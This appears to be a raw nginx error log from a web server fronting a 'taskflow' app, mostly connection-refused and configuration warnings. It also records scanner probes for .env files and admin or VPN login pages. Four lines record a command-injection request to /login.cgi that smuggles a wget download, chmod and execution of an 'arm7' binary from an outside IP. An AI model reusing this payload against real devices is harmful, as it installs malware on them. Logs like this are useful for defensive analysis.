2026/04/12 23:56:31 [warn] 161154#161154: *202 using uninitialized "hour" variable while logging request, client: 3.130.168.2, server: , request: " {  w`¨نB،جٌ›ƒêGمپ·m†§€J¥ص{‡ڑا•  ہ/ہ+ہہہہ	ہہ"
2026/04/13 00:14:15 [error] 161155#161155: *203 connect() failed (111: Connection refused) while connecting to upstream, client: 170.106.180.153, server: , request: "GET / HTTP/1.1", upstream: "http://127.0.0.1:5000/", host: "13.113.189.119"
2026/04/13 00:33:10 [error] 161155#161155: *206 connect() failed (111: Connection refused) while connecting to upstream, client: 45.33.12.122, server: , request: "GET / HTTP/1.1", upstream: "http://127.0.0.1:5000/", host: "13.113.189.119"
2026/04/13 00:40:41 [error] 161155#161155: *208 connect() failed (111: Connection refused) while connecting to upstream, client: 134.209.21.16, server: , request: "GET /squid-internal-mgr/cachemgr.cgi HTTP/1.1", upstream: "http://127.0.0.1:5000/squid-internal-mgr/cachemgr.cgi", host: "13.113.189.119"
2026/04/13 00:42:20 [error] 161155#161155: *210 connect() failed (111: Connection refused) while connecting to upstream, client: 82.24.249.12, server: , request: "GET /.env HTTP/1.1", upstream: "http://127.0.0.1:5000/.env", host: "13.113.189.119"
2026/04/13 00:42:20 [error] 161155#161155: *212 connect() failed (111: Connection refused) while connecting to upstream, client: 82.24.249.12, server: , request: "POST / HTTP/1.1", upstream: "http://127.0.0.1:5000/", host: "13.113.189.119"
2026/04/13 01:01:52 [error] 161155#161155: *214 connect() failed (111: Connection refused) while connecting to upstream, client: 216.180.246.138, server: , request: "GET / HTTP/1.0", upstream: "http://127.0.0.1:5000/"
2026/04/13 01:02:59 [error] 161155#161155: *216 connect() failed (111: Connection refused) while connecting to upstream, client: 205.210.31.150, server: , request: "GET / HTTP/1.0", upstream: "http://127.0.0.1:5000/"
2026/04/13 01:03:08 [warn] 161155#161155: *218 using uninitialized "year" variable while logging request, client: 216.180.246.138, server: , request: " ‎  ùءث­„§'¥gُC3×× ِ7­ Pضبُf „´ —<ء*n1>O\'@{ôڈµل(¯c¥‏ءlëس¹ي[‘v &ج¨ج©ہ/ہ0ہ+ہ,ہہ	ہہ"
2026/04/13 01:03:08 [warn] 161155#161155: *218 using uninitialized "month" variable while logging request, client: 216.180.246.138, server: , request: " ‎  ùءث­„§'¥gُC3×× ِ7­ Pضبُf „´ —<ء*n1>O\'@{ôڈµل(¯c¥‏ءlëس¹ي[‘v &ج¨ج©ہ/ہ0ہ+ہ,ہہ	ہہ"
2026/04/13 01:03:08 [warn] 161155#161155: *218 using uninitialized "day" variable while logging request, client: 216.180.246.138, server: , request: " ‎  ùءث­„§'¥gُC3×× ِ7­ Pضبُf „´ —<ء*n1>O\'@{ôڈµل(¯c¥‏ءlëس¹ي[‘v &ج¨ج©ہ/ہ0ہ+ہ,ہہ	ہہ"
2026/04/13 01:03:08 [warn] 161155#161155: *218 using uninitialized "hour" variable while logging request, client: 216.180.246.138, server: , request: " ‎  ùءث­„§'¥gُC3×× ِ7­ Pضبُf „´ —<ء*n1>O\'@{ôڈµل(¯c¥‏ءlëس¹ي[‘v &ج¨ج©ہ/ہ0ہ+ہ,ہہ	ہہ"
2026/04/13 01:05:48 [error] 161155#161155: *219 connect() failed (111: Connection refused) while connecting to upstream, client: 216.180.246.138, server: , request: "GET / HTTP/1.1", upstream: "http://127.0.0.1:5000/", host: "13.113.189.119"
2026/04/13 01:05:50 [error] 161155#161155: *219 connect() failed (111: Connection refused) while connecting to upstream, client: 216.180.246.138, server: , request: "GET /manage/account/login HTTP/1.1", upstream: "http://127.0.0.1:5000/manage/account/login", host: "13.113.189.119"
2026/04/13 01:05:51 [error] 161155#161155: *219 connect() failed (111: Connection refused) while connecting to upstream, client: 216.180.246.138, server: , request: "GET /admin/index.html HTTP/1.1", upstream: "http://127.0.0.1:5000/admin/index.html", host: "13.113.189.119"
2026/04/13 01:05:51 [error] 161155#161155: *219 connect() failed (111: Connection refused) while connecting to upstream, client: 216.180.246.138, server: , request: "GET /index.html HTTP/1.1", upstream: "http://127.0.0.1:5000/index.html", host: "13.113.189.119"
2026/04/13 01:05:51 [error] 161155#161155: *219 connect() failed (111: Connection refused) while connecting to upstream, client: 216.180.246.138, server: , request: "GET /+CSCOE+/logon.html HTTP/1.1", upstream: "http://127.0.0.1:5000/+CSCOE+/logon.html", host: "13.113.189.119"
2026/04/13 01:05:51 [error] 161155#161155: *219 connect() failed (111: Connection refused) while connecting to upstream, client: 216.180.246.138, server: , request: "GET /cgi-bin/login.cgi HTTP/1.1", upstream: "http://127.0.0.1:5000/cgi-bin/login.cgi", host: "13.113.189.119"
2026/04/13 01:05:52 [error] 161155#161155: *219 connect() failed (111: Connection refused) while connecting to upstream, client: 216.180.246.138, server: , request: "GET /login.htm HTTP/1.1", upstream: "http://127.0.0.1:5000/login.htm", host: "13.113.189.119"
2026/04/13 01:05:52 [error] 161155#161155: *219 connect() failed (111: Connection refused) while connecting to upstream, client: 216.180.246.138, server: , request: "GET /login.html HTTP/1.1", upstream: "http://127.0.0.1:5000/login.html", host: "13.113.189.119"
2026/04/13 01:05:53 [error] 161155#161155: *219 connect() failed (111: Connection refused) while connecting to upstream, client: 216.180.246.138, server: , request: "GET /login.jsp HTTP/1.1", upstream: "http://127.0.0.1:5000/login.jsp", host: "13.113.189.119"
2026/04/13 01:05:54 [error] 161155#161155: *219 connect() failed (111: Connection refused) while connecting to upstream, client: 216.180.246.138, server: , request: "GET /login HTTP/1.1", upstream: "http://127.0.0.1:5000/login", host: "13.113.189.119"
2026/04/13 01:05:55 [error] 161155#161155: *219 connect() failed (111: Connection refused) while connecting to upstream, client: 216.180.246.138, server: , request: "GET /doc/index.html HTTP/1.1", upstream: "http://127.0.0.1:5000/doc/index.html", host: "13.113.189.119"
2026/04/13 01:05:58 [error] 161155#161155: *219 connect() failed (111: Connection refused) while connecting to upstream, client: 216.180.246.138, server: , request: "GET /remote/login HTTP/1.1", upstream: "http://127.0.0.1:5000/remote/login", host: "13.113.189.119"
2026/04/13 01:06:00 [error] 161155#161155: *219 connect() failed (111: Connection refused) while connecting to upstream, client: 216.180.246.138, server: , request: "GET /admin/login.asp HTTP/1.1", upstream: "http://127.0.0.1:5000/admin/login.asp", host: "13.113.189.119"
2026/04/13 01:18:50 [error] 161155#161155: *233 connect() failed (111: Connection refused) while connecting to upstream, client: 45.148.10.249, server: , request: "GET /.env HTTP/1.1", upstream: "http://127.0.0.1:5000/.env", host: "13.113.189.119"
2026/04/13 01:19:14 [error] 161155#161155: *235 connect() failed (111: Connection refused) while connecting to upstream, client: 15.158.241.69, server: , request: "POST /api/auth/register HTTP/1.1", upstream: "http://127.0.0.1:5000/api/auth/register", host: "taskflow-prd-eb-app-env.eba-8xzqpp6j.ap-northeast-1.elasticbeanstalk.com"
2026/04/13 01:23:02 [error] 161155#161155: *237 connect() failed (111: Connection refused) while connecting to upstream, client: 15.158.241.69, server: , request: "POST /api/auth/login HTTP/1.1", upstream: "http://127.0.0.1:5000/api/auth/login", host: "taskflow-prd-eb-app-env.eba-8xzqpp6j.ap-northeast-1.elasticbeanstalk.com"
2026/04/13 01:23:05 [error] 161155#161155: *239 connect() failed (111: Connection refused) while connecting to upstream, client: 14.12.28.196, server: , request: "POST /api/auth/register HTTP/1.1", upstream: "http://127.0.0.1:5000/api/auth/register", host: "Taskflow-prd-eb-app-env.eba-8xzqpp6j.ap-northeast-1.elasticbeanstalk.com"
2026/04/13 01:23:10 [error] 161155#161155: *241 connect() failed (111: Connection refused) while connecting to upstream, client: 14.12.28.196, server: , request: "GET /actuator/health HTTP/1.1", upstream: "http://127.0.0.1:5000/actuator/health", host: "Taskflow-prd-eb-app-env.eba-8xzqpp6j.ap-northeast-1.elasticbeanstalk.com"
2026/04/13 01:40:57 [error] 161155#161155: *243 connect() failed (111: Connection refused) while connecting to upstream, client: 27.148.196.60, server: , request: "GET / HTTP/1.1", upstream: "http://127.0.0.1:5000/", host: "13.113.189.119"
2026/04/13 01:42:42 [warn] 193386#193386: could not build optimal types_hash, you should increase either types_hash_max_size: 1024 or types_hash_bucket_size: 64; ignoring types_hash_bucket_size
2026/04/13 01:42:43 [warn] 193419#193419: could not build optimal types_hash, you should increase either types_hash_max_size: 1024 or types_hash_bucket_size: 64; ignoring types_hash_bucket_size
2026/04/13 01:42:43 [warn] 193420#193420: could not build optimal types_hash, you should increase either types_hash_max_size: 1024 or types_hash_bucket_size: 64; ignoring types_hash_bucket_size
2026/04/13 01:45:43 [error] 193422#193422: *1 connect() failed (111: Connection refused) while connecting to upstream, client: 15.158.241.69, server: , request: "POST /api/auth/register HTTP/1.1", upstream: "http://127.0.0.1:5000/api/auth/register", host: "taskflow-prd-eb-app-env.eba-8xzqpp6j.ap-northeast-1.elasticbeanstalk.com"
2026/04/13 01:46:09 [error] 193423#193423: *3 connect() failed (111: Connection refused) while connecting to upstream, client: 14.12.28.196, server: , request: "GET /actuator/health HTTP/1.1", upstream: "http://127.0.0.1:5000/actuator/health", host: "Taskflow-prd-eb-app-env.eba-8xzqpp6j.ap-northeast-1.elasticbeanstalk.com"
2026/04/13 01:48:39 [error] 193422#193422: *5 connect() failed (111: Connection refused) while connecting to upstream, client: 71.6.232.30, server: , request: "GET / HTTP/1.1", upstream: "http://127.0.0.1:5000/", host: "13.113.189.119"
2026/04/13 01:55:38 [warn] 194441#194441: could not build optimal types_hash, you should increase either types_hash_max_size: 1024 or types_hash_bucket_size: 64; ignoring types_hash_bucket_size
2026/04/13 01:55:39 [warn] 194474#194474: could not build optimal types_hash, you should increase either types_hash_max_size: 1024 or types_hash_bucket_size: 64; ignoring types_hash_bucket_size
2026/04/13 01:55:39 [warn] 194475#194475: could not build optimal types_hash, you should increase either types_hash_max_size: 1024 or types_hash_bucket_size: 64; ignoring types_hash_bucket_size
2026/04/13 02:36:50 [warn] 194477#194477: *247 using uninitialized "year" variable while logging request, client: 72.49.246.191, server: , request: "GET /login.cgi?cli=aa%20aa%27;wget%20http://37.48.254.120/arm7%20-O%20/tmp/arm7;chmod%20777%20/tmp/arm7;/tmp/arm7%27$ HTTP/1.1"
2026/04/13 02:36:50 [warn] 194477#194477: *247 using uninitialized "month" variable while logging request, client: 72.49.246.191, server: , request: "GET /login.cgi?cli=aa%20aa%27;wget%20http://37.48.254.120/arm7%20-O%20/tmp/arm7;chmod%20777%20/tmp/arm7;/tmp/arm7%27$ HTTP/1.1"
2026/04/13 02:36:50 [warn] 194477#194477: *247 using uninitialized "day" variable while logging request, client: 72.49.246.191, server: , request: "GET /login.cgi?cli=aa%20aa%27;wget%20http://37.48.254.120/arm7%20-O%20/tmp/arm7;chmod%20777%20/tmp/arm7;/tmp/arm7%27$ HTTP/1.1"
2026/04/13 02:36:50 [warn] 194477#194477: *247 using uninitialized "hour" variable while logging request, client: 72.49.246.191, server: , request: "GET /login.cgi?cli=aa%20aa%27;wget%20http://37.48.254.120/arm7%20-O%20/tmp/arm7;chmod%20777%20/tmp/arm7;/tmp/arm7%27$ HTTP/1.1"
2026/04/13 02:43:10 [warn] 196685#196685: could not build optimal types_hash, you should increase either types_hash_max_size: 1024 or types_hash_bucket_size: 64; ignoring types_hash_bucket_size
2026/04/13 02:43:10 [warn] 196719#196719: could not build optimal types_hash, you should increase either types_hash_max_size: 1024 or types_hash_bucket_size: 64; ignoring types_hash_bucket_size
2026/04/13 02:43:10 [warn] 196722#196722: could not build optimal types_hash, you should increase either types_hash_max_size: 1024 or types_hash_bucket_size: 64; ignoring types_hash_bucket_size


